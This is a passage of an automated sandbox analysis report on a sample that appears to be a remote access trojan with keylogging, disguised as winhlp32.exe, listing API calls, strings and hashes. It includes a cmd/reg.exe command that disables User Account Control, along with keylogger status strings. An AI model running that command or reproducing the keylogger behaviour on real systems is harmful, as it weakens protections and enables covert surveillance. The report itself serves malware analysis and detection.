                                      • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                      • Part of subcall function 00412077: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                    • String ID:
                                    • API String ID: 3950776272-0
                                    • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                    • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                    • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                    • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __cftoe
                                    • String ID:
                                    • API String ID: 4189289331-0
                                    • Opcode ID: f6186a22dc1495ee10cb0196102dbbca6683bf9def1bac59c87bc21f53538327
                                    • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                    • Opcode Fuzzy Hash: f6186a22dc1495ee10cb0196102dbbca6683bf9def1bac59c87bc21f53538327
                                    • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                    • String ID:
                                    • API String ID: 493672254-0
                                    • Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                    • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                    • Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                    • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00448215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                    • _free.LIBCMT ref: 0044824C
                                    • _free.LIBCMT ref: 00448274
                                    • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                    • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                    • _abort.LIBCMT ref: 00448293
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$_free$_abort
                                    • String ID:
                                    • API String ID: 3160817290-0
                                    • Opcode ID: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                                    • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                    • Opcode Fuzzy Hash: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                                    • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                    • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                    • Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                    • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                    • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                    • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                    • Opcode Fuzzy Hash: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                    • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                    • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                    • Opcode Fuzzy Hash: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                    • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040B164 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                    • wsprintfW.USER32 ref: 0040B1F3
                                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: EventLocalTimewsprintf
                                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                    • API String ID: 1497725170-248792730
                                    • Opcode ID: 5930b91d6002e4bc173ab4be93e7cb7fd053249898d40d7797ac70fa62357d50
                                    • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                    • Opcode Fuzzy Hash: 5930b91d6002e4bc173ab4be93e7cb7fd053249898d40d7797ac70fa62357d50
                                    • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040A675 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                    • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                    • CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSizeSleep
                                    • String ID: XQG
                                    • API String ID: 1958988193-3606453820
                                    • Opcode ID: a936430ac144879a830ace31701bfe89764f94ae4ec5835598aad753144bf191
                                    • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                    • Opcode Fuzzy Hash: a936430ac144879a830ace31701bfe89764f94ae4ec5835598aad753144bf191
                                    • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegisterClassExA.USER32(00000030), ref: 0041D55B
                                    • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                    • GetLastError.KERNEL32 ref: 0041D580
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ClassCreateErrorLastRegisterWindow
                                    • String ID: 0$MsgWindowClass
                                    • API String ID: 2877667751-2410386613
                                    • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                    • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                    • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                    • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                    • CloseHandle.KERNEL32(?), ref: 004077AA
                                    • CloseHandle.KERNEL32(?), ref: 004077AF
                                    Strings
                                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                    • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$CreateProcess
                                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                    • API String ID: 2922976086-4183131282
                                    • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                    • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                    • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                    • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00407260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: SG$C:\Windows\winhlp32.exe
                                    • API String ID: 0-1895770939
                                    • Opcode ID: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                    • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                    • Opcode Fuzzy Hash: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                    • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044333A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                                    • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressFreeHandleLibraryModuleProc
                                    • String ID: CorExitProcess$mscoree.dll
                                    • API String ID: 4061214504-1276376045
                                    • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                    • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                    • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                    • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                    • String ID: KeepAlive | Disabled
                                    • API String ID: 2993684571-305739064
                                    • Opcode ID: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                    • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                    • Opcode Fuzzy Hash: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                    • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041ADC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                    • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                    • Sleep.KERNEL32(00002710), ref: 0041AE07
                                    • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: PlaySound$HandleLocalModuleSleepTime
                                    • String ID: Alarm triggered
                                    • API String ID: 614609389-2816303416
                                    • Opcode ID: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                    • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                    • Opcode Fuzzy Hash: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                    • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                    • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                                    • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                                    • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                                    Strings
                                    • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Console$AttributeText$BufferHandleInfoScreen
                                    • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                    • API String ID: 3024135584-2418719853
                                    • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                    • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                    • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                    • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                    • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                    • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                    • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00444CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                    • _free.LIBCMT ref: 00444E06
                                    • _free.LIBCMT ref: 00444E1D
                                    • _free.LIBCMT ref: 00444E3C
                                    • _free.LIBCMT ref: 00444E57
                                    • _free.LIBCMT ref: 00444E6E
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$AllocateHeap
                                    • String ID:
                                    • API String ID: 3033488037-0
                                    • Opcode ID: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                    • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                    • Opcode Fuzzy Hash: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                    • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00449365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                    • _free.LIBCMT ref: 004493BD
                                      • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 00449589
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                    • String ID:
                                    • API String ID: 1286116820-0
                                    • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                    • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                    • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                    • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
